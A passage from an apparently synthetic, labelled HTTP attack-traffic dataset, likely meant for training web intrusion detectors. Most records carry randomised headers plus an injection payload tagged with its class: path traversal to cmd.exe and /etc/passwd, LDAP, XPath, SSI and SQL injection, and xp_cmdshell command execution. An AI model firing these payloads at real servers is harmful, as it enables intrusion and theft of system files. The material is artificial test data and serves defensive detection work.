Date: Tue, 03 Aug 04 04:12:07 GMT
ETag: "3b.fk.WCMYAXJiT2"
Expect: nlsq
From: h5dt@dgwd.cz
If-Modified-Since: Sun, 06 Apr 08 21:59:27 GMT
If-Unmodified-Since: Thu, 20 Jul 06 18:19:51 CET
If-Match: "9yu6ni4Cq57sS6."
If-None-Match: "lUwiy4XMBqqwuBzE-9O"
If-Range: Fri, 11 Feb 05 22:14:46 GMT
Max-Forwards: 7222
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: aslasl sfwmhi=G8in4aid
Authorization: Basic dHZhSWJjaTpucmVVdzk=
Range: -568889,-588214
Referer: http://www.eoEuxo.uk/uleorr/RtRchB/he4axOe.mpeg
TE: deflate
Trailer: Accept-Encoding
User-Agent: Mozilla/8.0 (Windows; U; WinNT 7.1; vo-ae; rv:8.6.9) Gecko/46054749
UA-CPU: x86
UA-Disp: 695,8049,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 4371x6437
Via: 4etce/4.8 www.edao3see.png
Transfer-Encoding: t5ebt
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 791 www.41LmwOrr.jpeg:2 "hepateeosst" "Mon, 30 Apr 07 18:30:13 UTC"
X-Forwarded-For: 235.94.27.226
X-Serial-Number: 807714416153290560
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42311
Start - Id: 43764
class: OsCommanding
GET /cgi-bin/../../../../../../../WINNT/system32/ping.exe 127.0.0.1? HTTP/1.0
Host: www.titqapewap.cz
Connection: og9s
Accept: */*;q=0.7
Accept-Charset: iso-8859-8-i, x-mac-roman;q=0.0, euc-kr, iso-2022-jp, windows-1258
Accept-Encoding: compress, compress, deflate;q=0.8, deflate, compress
Accept-Language: *
Cache-Control: no-cache
Client-ip: 242.53.53.65
Cookie: vAooiI=jTu6o;tzzictTnaE8tlaf=nYWA;vfilspe5soar=eeaenippipa2itezl
Cookie2: $Version="1"
Date: Sun, 21 Nov 04 14:18:07 CET
ETag: "nd9_u0ZbZtMLDe87"
Expect: wspr4ebT
From: merccs0n@HaIq3eH9x.gov
If-Modified-Since: Fri, 03 Jun 05 08:30:18 GMT
If-Unmodified-Since: Tue, 07 Oct 08 19:59:30 UTC
If-Match: "Ja0D2jKowACW9diY2"
If-None-Match: "1uuUSlNtTmympqYd"
If-Range: *
Max-Forwards: 7307
MIME-Version: 8.9
Pragma: no-cache
Proxy-Authorization: Digest cnonce="l7ii"
Authorization: Basic ZGhyb0Flb2g6ZWVobGExcw==
Range: -541349,6-1
Referer: /rEutufen/ddhgi/jweLi/w6ovsf/a5reuu.js
TE: deflate,deflate,chunked;q=0.8
Trailer: Transfer-Encoding
User-Agent: tid-SCK http://www.l6ehfyk.st
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 757x0361
Via: 7.6 www.jm2hErsu.jpg, HTTP/4.2 www.aged.png, 9.9 www.saos.css
Transfer-Encoding: identity
Upgrade: o9h5r/6.8, 6Ah/8.0, nazl/9.6, 2Odwz/0.1, cfaEl/6.1
Warning: 725 239.192.69.199 "oo5kiaaie" "Thu, 23 Jun 05 19:03:49 CET"
X-Forwarded-For: 247.183.255.17
X-Serial-Number: 026026261334603
----: ----------
~~~~~: ~~~~~~~~~~~~~~~

null

End - Id: 43764
Start - Id: 44335
class: OsCommanding
GET ..%5c../..%5c../..%5c/..�../..�../..�../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.TiseUthp.gov
Connection: 9ajeaelN
Accept: video/*, application/rtf;q=0.7
Accept-Charset: *
Accept-Encoding: compress, identity
Accept-Language: *
Cache-Control: rnridja='elaletdx'
Client-ip: 189.90.122.222
Cookie: eosleoth=Anm8zy~
Cookie2: $Version="29"
Date: Thu, 03 Apr 08 17:29:12 GMT
ETag: "pOapT_4.CIXI5gO"
Expect: tnstr3=Ht7tPac;rhjSmod
From: ssaaei@srTei5is.de
If-Modified-Since: Tue, 17 Jan 06 01:32:43 GMT
If-Unmodified-Since: Thu, 15 Feb 07 09:07:32 CET
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Apr 10 08:26:09 GMT
Max-Forwards: 6
MIME-Version: 1.6
Pragma: 7mWl='niVY'
Proxy-Authorization: Basic T2hsMGg6YWFhMg==
Authorization: Digest qop=o9hhYhvt
Range: 88-15414
Referer: http://Irqdlun.cz/cors1A/t3ldme/yAnlu9i/Kelpdls9.aspx
TE: trailers
Trailer: If-None-Match
User-Agent: uouebr
UA-CPU: PowerPC
UA-Disp: 8897,9221,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 127x111
Via: 3mg/9.0 228.95.189.55
Transfer-Encoding: gzip
Upgrade: srlma/8.2, So6/5.2, moPz/7.3, aeng/1.5, aoyO0a/8.2
Warning: 450 137.33.40.57 "ymhep" "Sat, 27 May 06 20:03:51 UTC"
X-Forwarded-For: 81.125.200.90
X-Serial-Number: 4707675607021024979
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44335
Start - Id: 46007
class: PathTransversal
POST /gos2shanv/Bvbscriptpasswd_ZMa/riie1ktbh/dX./ea2ymm/Ue8rc5tke.jpg? HTTP/1.1
Content-Length: 190
Content-Language: xgh,sCwiceuy
Content-Encoding: gzip
Content-Location: http://www.Etljd.cz/HYtlhe/nimc/hocD/8Soaee/oauTwtcs.txt
Content-MD5: eWZSSGw1dHdnbHJsdWFvdA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 Jul 04 02:14:42 CET
Last-Modified: Fri, 23 Dec 05 12:57:29 CET
Host: 51.221.172.214:80
Connection: eesole
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: tcta-mi;q=0.0
Cache-Control: max-age=44955
Client-ip: 8.209.10.66
Cookie: 6hAdsoiea1tagi=../../../WINDOWS/autoexec.bat
Cookie2: $Version="3"
Date: Tue, 16 Jun 09 02:38:29 UTC
ETag: "DwjuXoIJ4PqA-CoazpS"
From: ATat8x@cdreeb38.be
If-Modified-Since: Mon, 12 Sep 05 23:00:21 GMT
If-Unmodified-Since: Sun, 20 Jun 04 03:38:11 GMT
If-Match: "I2apxRkPgh.OiyMTUs"
If-None-Match: *
If-Range: "cNjZmbNSYa_NHeNtMoZp"
Max-Forwards: 02
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest username="pt1HO0"
Authorization: Basic dWtFbnhhOkVlbmh1YQ==
Range: 3552-,-983
Referer: /snaha/amruerff/sean9ei/1wlntaI/3hhds.jpeg
TE: gzip;q=0.7,deflate,trailers
Trailer: Host
User-Agent: ttrr6i/8.9
UA-CPU: PowerPC
UA-OS: Windows 95
Via: 7.7 146.35.10.29:31, FTP/2.9 www.dbtery.css:78111, HTTP/4.9 www.cypoq9.html:57560
Transfer-Encoding: compress
Upgrade: iuw/5.4, l3gi4/7.6, DrEeu7/0.6, o1deOs/9.1, aems/3.3
Warning: 074 www.slklnhL1.tiff "cfcq5eaWWo" "Sat, 25 Jul 09 21:32:24 CET"
X-Forwarded-For: 57.47.229.238
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

aToe=e64klJpjNL&neepyis2enr=Waccess_logphpet]le-zsBlo&uiCsslboee=elasttade&ounmdwyomtnab=e8aon&mehi9ea=yteton&dnttsn0re=7rvJ&qdooh2ssdk=I+tydnc&n6eudtaarrtnzta=riHvjUnNRcDn&4v=nhle+n n

End - Id: 46007
Start - Id: 39127
class: LdapInjection
POST /ncgAMUOr@haF@N8/taoHOar0olbr/Qs8@u8POjaLxlV7/c0DJkjt5/cC99IcAa6NNDMK/lchwoyjG4utds92.sh? HTTP/1.1
Content-Length: 30
Content-Language: q,eeHbpNre
Content-Encoding: gzip
Content-Location: http://wmdrb.cz/6lee/ooharen/seri/stekLw/teooo.css
Content-MD5: YXNxb2VudDJhNGFpb3Rhbw==
Content-Type: application/x-www-form-urlencoded
Host: 62.56.29.208
Connection: keep-alive
Accept: image/gif;q=0.7, image/png
Accept-Charset: iso-8859-4, iso-8859-8-i;q=0.6, x-mac-greek
Accept-Encoding: gzip
Accept-Language: e6orumo-nrsrpetn;q=0.4
Cache-Control: delss9se='fwhnew0q'
Cookie: nerndrhEptewuh4=)( |(displayName=had*)  (name   =had*    )(  mail=had*   );EeT1eosifitst=arr?snwgetu;uofcoi=8109605881;rwshmiddsh=2533
Cookie2: $Version="33"
Date: Thu, 17 Jul 08 03:47:10 UTC
If-Unmodified-Since: Sat, 31 Mar 07 16:31:22 CET
Max-Forwards: 3237
MIME-Version: 7.1
Authorization: Basic ZGF1c25hOjdsOWxsZQ==
Referer: /aTib.mspx
Trailer: Max-Forwards
User-Agent: Mozilla/9.4 (Machintosh; U; PPC Mac OS X 7.9; Gt-ut; rv:5.5.8) Gecko/14536337
UA-Color: color32
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

nieeso4erq=a& enesvNwaslpieh

End - Id: 39127
Start - Id: 40906
class: SSI
GET /sgendwyyz0wmcyd/dtanen9stf/tJNEcTPTIvgUNfMH2@X1/fnnbtkyOdai/Xb.T@-ant2udYyn/ecfe7iieht/SprrstylecXN/5a8fit4htzurer/aLT.BMNOIyduJU0Ep9T.tiff?_xJ9Jscript2=gEFOr6NYuUpM&aiihdCt47Scnl=82351&Lithmt=024&P8P18AM=lngno7Nhoay&neCidorqee=fGrCNnI3X4&tsiTnvwoaWrEp=saai8%2Br&t5bcaahrbehEEg=tmeehzlnlGurd&EtuaitReR=%3C%21--+%23odbc+++++statement++%3D%22select+++nn%2C++++elp4ti%2C++oo+++++from++hhgtech++order+by++3%2C++++80%2C+++2%22++++--%3E HTTP/1.0
Host: www.ehote.uk:80
Connection: xiytgS
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=07
Client-ip: 176.215.222.66
Date: Thu, 23 Aug 07 20:14:30 UTC
From: 7tnz7e@rrkue5aod.it
If-Unmodified-Since: Mon, 15 Aug 05 10:20:08 UTC
If-Match: "JM2M0.uwWBNmEmxoT-2"
If-None-Match: *
Max-Forwards: 479
MIME-Version: 0.0
Pragma: 6='vhs1e3q'
Authorization: Basic eGl1ZTJXaXQ6b2VzZTY=
Referer: /ereepc/dxgmpa3j.asp
TE: deflate;q=0.9
User-Agent: sfosmF5MY http://www.ssaprm.uk
UA-CPU: MIPS
UA-OS: FreeBSD
Via: unjiF/7.5 www.porew.html, HTTP/2.0 243.127.206.93
Warning: 086 61.20.174.151 "hej5T2phoa6l2adseC1t" 
X-Serial-Number: 163741114628927

null

End - Id: 40906
Start - Id: 49259
class: XPathInjection
GET /rHuRDkj.FhbGaWODL2/ntueeehs/vxftZizutkgQDIOPv.gif?qi=%3D&unMmtnhtFuso=in3irrvithf&sfprIiytz1ksn=xsueiadn%27+++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++or+++++%27Nju2lrt%27+%3D++++%27&ntt=rf5yFidest1ateet HTTP/1.1
Host: www.omtht.it
Connection: close
Accept: application/zip;q=0.4, application/*
Accept-Charset: windows-1250;q=0.5
Accept-Encoding: *;q=0.1
Accept-Language: tis-Tts;q=0.5, jaOl-l;q=0.4
Cache-Control: only-if-cached
Client-ip: 164.16.9.167
Cookie: sock_streamsystem@8ney7K=et
Cookie2: $Version="395"
Date: Thu, 28 May 09 24:14:02 GMT
ETag: W/"jGu3szARAyYEzvM"
Expect: wtti
From: lqie@4vraituc.com
If-Modified-Since: Tue, 18 Dec 07 20:44:23 GMT
If-Unmodified-Since: Sat, 02 Jan 10 11:49:31 GMT
If-Match: *
If-None-Match: *
If-Range: Fri, 01 Dec 06 11:45:18 UTC
Max-Forwards: 379
MIME-Version: 6.6
Pragma: no-cache
Proxy-Authorization: Basic bm9UdXk6cTBud210
Authorization: OxOs gqtaamlf=9Sry6
Range: 560-83908
Referer: /ayhnyca/eietl/deoi/8rne4i.jsp
TE: gzip;q=0.5
Trailer: TE
User-Agent: adXu.GLI http://www.sLgyJeed.cz
UA-CPU: x86
UA-Disp: 2447,4165,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 666x0440
Via: 4.5 159.216.184.16, 6.0 164.19.24.113, 3.6 78.61.205.214
Transfer-Encoding: gzip
Upgrade: ee0N/5.7, ya0/9.2, ekl/0.1, ersamh/6.5, Blfo/3.2
Warning: 499 41.174.135.222 "no1hbieoekpoibdw" "Wed, 22 Dec 04 11:45:31 UTC"
X-Forwarded-For: 199.200.159.0
X-Serial-Number: 15070707581939695
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49259
Start - Id: 37966
class: LdapInjection
GET /2d.W14ub456Bi9E/pxtowtheew8muibnttet/isi/iti9ye/npQiPLysI4FktX07/lBmtHB1kEl8MD/ecnoagnB.mdb?hltepnhwdd=936420575&lmio06ne9lw=having5rtuahT&te=lqiaKS&djZBhrKpYhf=87&JNAUwRkwhere71divI=nth%29%28%26%28objectClass%3D++++4he*%29 HTTP/1.1
Host: 155.193.89.86
Connection: soplnle6
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.5
Accept-Language: toHoe-Nteeh2gu, yc-nutoeJ, nee-do;q=0.5, h5oa8l-tarRte5;q=0.0, anef-d
Cache-Control: no-transform
Client-ip: 177.141.172.83
Cookie: gatw2arta4if=eedeletee(aurJecho:e $r;rt5IenemrLsI=bJDck;O8aRdvbscript=775855342;spees=830473;slqoudeiio3=6;nfpaOAn=eCKnqH59N
Cookie2: $Version="9"
Date: Fri, 05 Mar 04 12:13:26 GMT
ETag: W/"l5kqXBDpFxLgZiUAxf"
Expect: 100-continue
From: ob6jr0@oucA7niAri.it
If-Modified-Since: Sun, 17 Aug 08 12:55:10 UTC
If-Unmodified-Since: Mon, 24 May 04 02:37:25 UTC
If-Match: "LvuOuCqs2pFjyYMp0ml2"
If-None-Match: *
If-Range: "HHGLgH@t25Ogq-B"
Max-Forwards: 928
MIME-Version: 8.4
Pragma: orCtse=Ie
Proxy-Authorization: Digest qop=auth
Authorization: NTLM UmV0aGlwb3Jzc2VpYWxyaTNpb2ltRW1PYTdxZXRwbmRHbWU4Ng==
Range: -8,482604-
Referer: /0mrwzeri.msf
TE: trailers
Trailer: Warning
User-Agent: Mozilla/5.8 (compatible; pswSibea; Open BSD i386; lfdeL8ty; atnkrzap; 8samn)
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8848x2681
Via: 4.5 www.iwrotsoe.htm, 6.3 128.119.10.91
Transfer-Encoding: identity
Upgrade: meng/6.1, eFlrhd/9.3, 8sNla/8.7
Warning: 700 www.fia1N.gif "guys2ngneaoLs2joonsi" "Fri, 30 Dec 05 15:06:31 CET"
X-Forwarded-For: 59.231.233.194
X-Serial-Number: 800649
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37966
Start - Id: 37905
class: LdapInjection
GET /EkpGvcb2input/@Ygnvbscript7V/vor/i5zuBOs/eoz/OB/af6ioaoljppsns/ta9l72./dHcathxb7JAhX/fOSinooth73t8rwOna/8N/qM5a94xs.cgi?gmAT=06%29%28%26%28objectClass%3Dl3bs%29%28%7C%28sn++++%3D+++zM%29%28cn%3Dnubi+J*%29%29&NqjX3xmltul=157469082 HTTP/1.0
Host: 16.48.165.158
Connection: p40qe9ke
Accept: application/x-tar;q=0.5, audio/*, text/*
Accept-Charset: iso-2022-jp;q=0.1, iso-8859-2, iso-8859-15, big5;q=0.2, x-mac-chinesesimp;q=0.8
Accept-Encoding: *;q=0.9
Accept-Language: *
Cache-Control: max-age=36386
Client-ip: 206.217.112.201
Cookie: hgshsahfb9dw=ihReti5tsvzjpgb;3proiece=ouUr0@1wtqw;pefisneikeer=dl2as Spar0extmp
Cookie2: $Version="005"
Date: Tue, 04 May 04 02:45:30 UTC
ETag: W/"a9r8skgCf6j3jPQ0o-oa"
Expect: rtuj9fsi=tnild
From: pyeere9e@rgid7rnosp.be
If-Modified-Since: Mon, 01 Jun 09 03:38:39 CET
If-Unmodified-Since: Mon, 25 Sep 06 11:39:32 GMT
If-Match: *
If-None-Match: "KPyQYS3ZDOJzjYnPKR"
If-Range: Wed, 28 Feb 07 05:55:11 CET
Max-Forwards: 341
MIME-Version: 1.5
Pragma: no-cache
Proxy-Authorization: NTLM MGVydXNoYWU0VVRubjF6ZWZtcmV2b3ZkZWx1aVBuZ3RvRXJhY29ybmRo
Authorization: Basic bnJXZXNnOjk5cDlzbDZk
Range: -004662,03-,-2001
Referer: /ieesy/a7eaoim/lxamem/mDrseah/fntnet.exe
TE: gzip
Trailer: User-Agent
User-Agent: riIxEj http://www.Dhtim.uk
UA-CPU: Sparc
UA-Disp: 472,2226,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 649x451
Via: 6.5 www.ctxn.png
Transfer-Encoding: gzip
Upgrade: 1tena/5.3
Warning: 778 www.sriAh.html "u4ef" 
X-Forwarded-For: 146.237.137.95
X-Serial-Number: 17792276895005878262
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37905
Start - Id: 38209
class: LdapInjection
GET /tmAtclbmrosyansrhnao/noOszX4lRuPuU5fbpt/iRg-zAruMMYqsGn6c3/eK0Hpc@MSsqSMEgiON8@/atneiletYp3igw7c3E/h8nn7.exe?aueHetsoim=a09ai1sio7mi&eshp=aeisnocgreatk2&Lpnmtnn=ojrmrfelupeobjecte&ee9Es=mvy6H5c&0axtetnoemo=%28e&1eqtnllAxkubdy=processing-instructionux-%25%3Bee%5Bahes%3A%5Ddreplace+&etrt5sdm=mrta&ponr2aoW=9ioa%26es%2B%3Edo4%3AH%3BfFsn&ltnetauu=3&cnofEefa=l%40s&unx1ayatmneeWp=hn&rr4edsmin=iGdFJZ&blalnL=1&iitahSatat=69%29%28%26%28objectClass%3DePd%29%28%7C%28sn%3D+++05%29%28cn%3DEn+++J*%29%29&dciiih=eou0%40haycesystemd0a%7E%5Cbin%29e%7Ea HTTP/1.0
Host: 160.27.75.248
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: iso-8859-1, windows-1257
Accept-Encoding: deflate, gzip, gzip;q=0.7
Accept-Language: *
Cache-Control: lDtiin='d'
Client-ip: 9.211.101.123
Cookie: e98uhsscasq=2;stzdBEd=oHmdaBlie;I4J9K3MTD7wE=pQjK817o-jPE;7yrZbistPm=ne5;positionjvH_2mrcptelnet8vc=wRoUqcx
Cookie2: $Version="98"
Date: Sat, 19 Aug 06 17:00:17 UTC
ETag: W/"aPd7NLiKRbSbcJc"
Expect: efooed
From: hnrpa@Dtsdlni.be
If-Modified-Since: Thu, 27 Jul 06 14:54:35 CET
If-Unmodified-Since: Mon, 31 Dec 07 24:31:08 GMT
If-Match: *
If-None-Match: *
If-Range: "RuRknExHSUWfriMnci-"
Max-Forwards: 3132
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: tnEjr B7bt5=zaeTe
Authorization: Digest username="E4tpls9"
Range: 1527-875,9678-
Referer: http://www.nnadSoch.ch/3ytlitt/Febc/auWYU/tfnnrwo.html
TE: trailers
Trailer: Warning
User-Agent: Mozilla/4.7 (compatible; Konqueror/8.8; Linux i386; gsnRamDro; emtm8pIm)
UA-CPU: 68000
UA-Disp: 6450,8964,32
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 321x2267
Via: FTP/7.9 www.osnj7.png
Transfer-Encoding: deflate
Upgrade: mrrUlT/4.8, 7edu/8.3
Warning: 799 www.ptdan.js "sttJl" "Thu, 26 Aug 04 17:54:20 GMT"
X-Forwarded-For: 80.167.139.18
X-Serial-Number: 47317311019714332645
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38209
Start - Id: 40988
class: SqlInjection
GET /sW8FgZhRf5/muni1Xcn1eaudisn/lsC.9/Wiberqdn8tli/datena66zdrir/4eboot.iniHaqN.exe?se=780385 HTTP/1.0
Host: www.aont.biz
Connection: keep-alive
Accept: image/*
Accept-Charset: *
Accept-Encoding: gzip, compress;q=0.1
Accept-Language: *;q=0.0
Cache-Control: uOddEhc=j
Client-ip: 136.159.244.84
Cookie: GG-nlib=24;elfEfnnR6=sl;OXMcopySZ6child91http=eIDVCSYzufXo;DecIo=bulk   insert     oqC    from 'pwdump.exe'    with   (codepage='RAW')
Cookie2: $Version="11"
Date: Thu, 07 Jan 10 19:10:53 GMT
ETag: W/"-ug5NWVnwdO6MSNr"
From: 0nhkngwk@nPuAseshox.org
If-Modified-Since: Tue, 19 Jan 10 20:24:59 CET
If-Unmodified-Since: Tue, 28 Dec 04 03:34:52 UTC
If-Match: *
If-None-Match: "FZvavhJoOipm9l0G"
If-Range: Thu, 29 Oct 09 12:00:06 GMT
Max-Forwards: 8012
Pragma: idalT=eqtrE
Authorization: onk0lu iplwqid=snda7s
Range: 15178-344,925-637476,9-
Referer: http://drjveAe.fr/nbvneA6/3eeo2e/roii/1euirntn.php3
TE: chunked;q=0.4,trailers,gzip
User-Agent: Mozilla/1.2 (Windows; U; Windows NT 9.9; yi-Ao; rv:9.4.3) Gecko/99593246
UA-CPU: x86
UA-Disp: 533,4193,32
Warning: 380 www.amsn.jpeg "nfxsyt3ttS2Uersfbaow" "Fri, 05 Sep 08 12:47:24 UTC"
X-Serial-Number: 7418181205236277
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40988
Start - Id: 38862
class: LdapInjection
GET /a_J_/nnpWNM4Y/1gPVWyYh8n/wribqso/e0Q0m-P/ryHoshlrs9T3h3nTdoxt.png?fsci7ey=cw&barjvzhuser=uea&tmthjtklw2ehor=aSpjgTio43&afes=e&MconnectoA2.p=ddltx+ed%40tI&afstiAh8eaLsd=%29++++%28+%7C+++%28+++cn%3D*o++%27brien*++++%29%28mail++++%3D*o++%27brien*+++%29+&ckrriheibcn=108525498&ente8ngarnEnas3=3vbscriptuS%260mv&TsejcvyoihNtRla=7&processing-instructionSVformR5libdH@-=r4cEyhsn6&uTexecb=5208&e1Ctovs5t=43&etea=eA8lperl&SssHa00=b4wf HTTP/1.0
Host: www.zeoe.st:0644
Connection: 3rzer
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: deflate;q=0.6
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 214.111.130.134
Cookie: D72BBorNA=nlbtqeiatahrm;AV9qE=cet;orumttntrrhh7et=rxaRDz
Cookie2: $Version="90"
Date: Mon, 22 Dec 08 20:22:26 UTC
ETag: "vPqCh0e@JCG5mEQa3dQ"
Expect: t02I
From: tdusret@b5koNnc.biz
If-Modified-Since: Sat, 17 Nov 07 16:01:50 CET
If-Unmodified-Since: Thu, 31 Jan 08 21:59:36 CET
If-Match: *
If-None-Match: "EijzNd0bPQmmndHU9"
If-Range: *
Max-Forwards: 17
MIME-Version: 1.7
Pragma: OeklI=txt
Proxy-Authorization: Digest username="m6Aioe"
Authorization: Digest opaque="xEati"
Range: 317-,-056
Referer: /3tbde1/aot7tZao.js
TE: gzip;q=0.5,gzip,deflate
Trailer: Accept-Language
User-Agent: Raocnrveqhjtus
UA-CPU: MIPS
UA-Disp: 117,0811,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 279x383
Via: 1.3 134.108.212.227:66709, FTP/1.6 105.255.212.120:074, HTTP/3.3 www.dEhdyr.css
Transfer-Encoding: gzip
Upgrade: rang/4.2, ntdtl/5.2, nrNyk/9.6, Phof1/9.0, mtwom/4.4
Warning: 172 228.33.193.154 "nienhhonlnuio8cmpet" "Sat, 12 Aug 06 02:08:19 GMT"
X-Forwarded-For: 19.159.202.2
X-Serial-Number: 74857144808284221
----: -------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 38862
Start - Id: 36427
class: OsCommanding
PUT /lZEju5snYYp0l/ilnhtcje/8mKZug4Y7-unKDMb3/zZOVzwgetHLWayw@/ntr62EtCen/8s/aumu3r1UX.@D.YDuwad/hkvm3Pz.gif? HTTP/1.1
Content-Length: 190
Content-Language: gm,Htehi
Content-Encoding: deflate
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 25 Jul 07 09:20:02 GMT
Last-Modified: Sun, 04 Jul 04 03:01:13 UTC
Host: www.r9es.gov
Connection: keep-alive
Accept: application/zip, application/*;q=0.0
Accept-Charset: utf-7, koi8-r, cp-932;q=0.0, us-ascii
Accept-Encoding: gzip, identity, deflate;q=0.1, gzip;q=0.7
Accept-Language: exec   xp_cmdshell     '"2otfa"     >>   script.vbs'
Cache-Control: no-cache
Cookie2: $Version="601"
Date: Thu, 15 Apr 10 12:01:12 GMT
If-Match: "gl2m8yQGmiZC@2U"
Pragma: no-cache
Referer: /uxoee/oechmAsw.gz
User-Agent: estpietglge3ii
UA-Disp: 4039,4471,32
UA-OS: Win95

OgI0dMG-nullTt=n4OE2FsyY&jmskaaosb0=xDiAc&GenxmanltaiapN6=48610455&av5iewtharRpLa=rcoridhirttttatE&ate27uans=352373&3nIelpmr5bszebn=54233314&0qyshgEthnxb=182963881&gLcZi5gX0mp=vgoamssidetyTh

End - Id: 36427
Start - Id: 42298
class: SqlInjection
GET /tigceohedplswW5/I6de/lypAIRYAL7Gzap9RxY/IarowwcQOrftvviowoe/VCBCxtermU@/snR/oRoeni2mteDElngtwn/n1KQW74/rWGsm1_OLh.f2oMmZY@e/NBv45./ECtsruoemTnqvcoT.tiff?hgik49atfld=10291&haSliEtTer3=estm&dgiraeo93qih=ohr9togk&dadcjl=%3At8T&6Oerg59noeytte=%27++++OR+%27ns%27++++BETWEEN+++%27R%27++AND++%27T&qNnetudf=gB5Tmvz%40C&VcNZW4HIa4echo=icowir4eqb&5sE1uancnr=hLgv3t_-YUnS&rehauealIh9a=izcHde%5DytrtnlH7t4d%7C%25&nc7nHaoAwasatc=mnVQI&Uii7c1royl=eqbPVtqq&up=3253203&etbzbbEdweu=70861200&mAsoahgii9p=2iy+&ErZYva-=openeOexec2 HTTP/1.1
Host: www.nnauQ.org:80
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: min-fresh=030
Client-ip: 247.6.107.97
Cookie: csTJees=ms nandfT$passwdoet rIhE;Ee0hoe=h0UiFFJ1;ia5tl=oA1vcTLjQ6Vr
Cookie2: $Version="4"
Date: Sun, 26 Nov 06 13:01:10 GMT
ETag: W/"17F1n2q6q2So7mxf"
Expect: qssn
From: eja4te@bepeeeedt.net
If-Modified-Since: Sun, 08 Feb 04 07:37:54 UTC
If-Unmodified-Since: Sun, 04 Nov 07 22:26:31 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 69
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM c2NTYTJ1bDV3emVlZXlUZWV0ZHJhZXR5ZHJiN2dlaWNvY2ZTaWhlZW9ybWNq
Authorization: NTLM ZWJhOGd0aGtkRWxlYWxyY1R5dnNlczVscGhrdHJoZGtJdGMwQUVhN3I=
Range: -568889,-588214
Referer: http://www.eeu2u5j.cz/saiiagga/AEhh.exe
TE: gzip,trailers
Trailer: If-None-Match
User-Agent: eal6z8siLitijhzsn
UA-CPU: 68000
UA-Disp: 695,8049,32
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 5338x078
Via: FTP/8.4 www.dbMa4sc.jpeg:455
Transfer-Encoding: wtaZya; iEiNota=sh2ite
Upgrade: i7iya/1.9, iT3ylo/7.2
Warning: 720 www.EuHgp.tiff "rnts" 
X-Forwarded-For: 116.157.87.80
X-Serial-Number: 04281896370974
----: --------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 42298
Start - Id: 46288
class: PathTransversal
GET /lTSAMnJ/IRzmTy_TUDv/st4Rdses5caUneez/a2te2ouaUttnnqerRqc/iyuu4iaT3h6UgeeH/vexecwhereW1N0drop.ynph-A/yhYm.jpeg?9noalA8A9e=rBw&.3fgcG=riripizho&rilcSbl2cdm4A=807685202&idut2u5rhmdr=2153&nst8nueUp=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&Awsydvrel=%2936cmds&5sed=het3&eet=hrlseaLeJ&i44iw=60&ho3z=awp-ve9Eftpii&nrhsa=67604375 HTTP/1.0
Host: 55.217.187.159
Connection: keep-alive
Accept: application/postscript;q=0.7, audio/basic;q=0.9, video/mpeg
Accept-Charset: *;q=0.0
Accept-Encoding: *;q=0.6
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 54.146.114.194
Cookie: 5cr=spEjrsn6orohmarEs;DGhH5ncS8nZ=anlt0afhsmtro$n~;o9se=tm7c
Cookie2: $Version="671"
Date: Sat, 09 Aug 08 14:49:40 CET
ETag: W/"Tr79t_UXhl_B.uI5Su"
Expect: 100-continue
From: rhcEtdlT@plt6rnlmRh.it
If-Modified-Since: Sun, 28 Jun 09 01:45:42 UTC
If-Unmodified-Since: Thu, 18 Mar 10 24:25:32 UTC
If-Match: "dH1NbQc.n_I3mJu5."
If-None-Match: "BWYnQVYZZntYhMidtpH"
If-Range: Fri, 29 Oct 04 11:02:37 CET
Max-Forwards: 5
MIME-Version: 4.9
Pragma: no-cache
